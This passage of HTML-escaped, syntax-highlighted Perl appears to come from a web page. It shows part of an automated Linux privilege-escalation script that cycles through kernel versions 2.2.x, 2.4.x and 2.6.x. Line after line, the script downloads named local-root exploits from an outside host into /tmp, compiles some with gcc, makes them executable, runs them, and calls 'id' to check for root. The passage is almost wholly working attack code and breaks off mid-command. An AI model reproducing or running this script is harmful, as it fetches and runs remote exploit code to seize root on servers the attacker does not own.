style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; command&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;local2&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;Welcome To 2.2.x Section&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/elfcd1.c;gcc elfcd1.c -o elfcd1;chmod 777 elfcd1;./elfcd1"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/mremap_pte;chmod 777 mremap_pte;./mremap_pte"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/uselib24;chmod 777 uselib24;./uselib24"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/ptrace24;chmod 777 ptrace24;./ptrace24"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"id"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;local4&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/pwned.c;gcc pwned.c -o pwned;chmod 777 pwned;./pwned"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/kmod;chmod 777 kmod;./kmod"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/newlocal;chmod 777 newlocal;./newlocal"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/uselib24;chmod 777 uselib24;./uselib24"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/brk;chmod 777 brk;./brk"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/brk2;chmod 777 brk2;./brk2"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/ptrace;chmod 777 ptrace;./ptrace"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/ptrace-kmod;chmod 777 ptrace-kmod;./ptrace-kmod"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/2.4.22.c;gcc 2.4.22.c -o 2.4.22;chmod 777 2.4.22;./2.4.22"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/loginx;chmod 777 loginx;./loginx"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/hatorihanzo.c;gcc hatorihanzo.c -o hatorihanzo;chmod 777 hatorihanzo;./hatorihanzo"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/mremap_pte;chmod 777 mremap_pte;./mremap_pte"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/Linux-kernel-mremap.c;gcc Linux-kernel-mremap.c -o Linux-kernel-mremap;chmod 777 Linux-kernel-mremap;./Linux-kernel-mremap"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/uselib24;chmod 777 uselib24;./uselib24"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/expand_stack.c;gcc expand_stack.c -o expand_stack;chmod 777 expand_stack;./expand_stack"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/elflbl;chmod 777 elflbl;./elflbl"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"id"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;local6&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/h00lyshit;chmod 777 h00lyshit;./h00lyshit"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/krad;chmod 777 krad;./krad"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/myptrace;chmod 777 myptrace;./myptrace"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/hudo.c;gcc hudo.c -o hudo;chmod 777 hudo;./hudo"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/05;chmod 777 05;./05"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/krad2;chmod 777 krad2;./krad2"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/ong_bak.c;gcc ong_bak.c -o ong_bak;chmod 777 ong_bak;./ong_bak"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.9-55-2007-prv8;chmod 777 2.6.9-55-2007-prv8;./2.6.9-55-2007-prv8"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/04;chmod 777 04;./04"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/06;chmod 777 06;./06"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/r00t;chmod 777 r00t;./r00t"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/uselib24.c;gcc uselib24.c -o uselib24;chmod 777 uselib24;./uselib24"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.11.c;gcc 2.6.11.c -o 2.6.11;chmod 777 2.6.11;./2.6.11"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/k-rad.c;gcc k-rad.c -o k-rad;chmod 777 k-rad;./k-rad"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/k-rad3;chmod 777 k-rad3;./k-rad3"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/pwned;chmod 777 pwned;./pwned"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/binfmt_elf.c;gcc binfmt_elf.c -o binfmt_elf;chmod 777 binfmt_elf;./binfmt_elf"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/elfcd2.c;gcc elfcd2.c -o elfcd2;chmod 777 elfcd2;./elfcd2"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct1;chmod 777 prct1;./prct1"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct2;chmod 777 prct2;./prct2"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct3;chmod 777 prct3;./prct3"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct4;chmod 777 prct4;./prct4"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct6;chmod 777 prct6;./prct6"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/raptor;chmod 777 raptor;./raptor"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.17;chmod 777 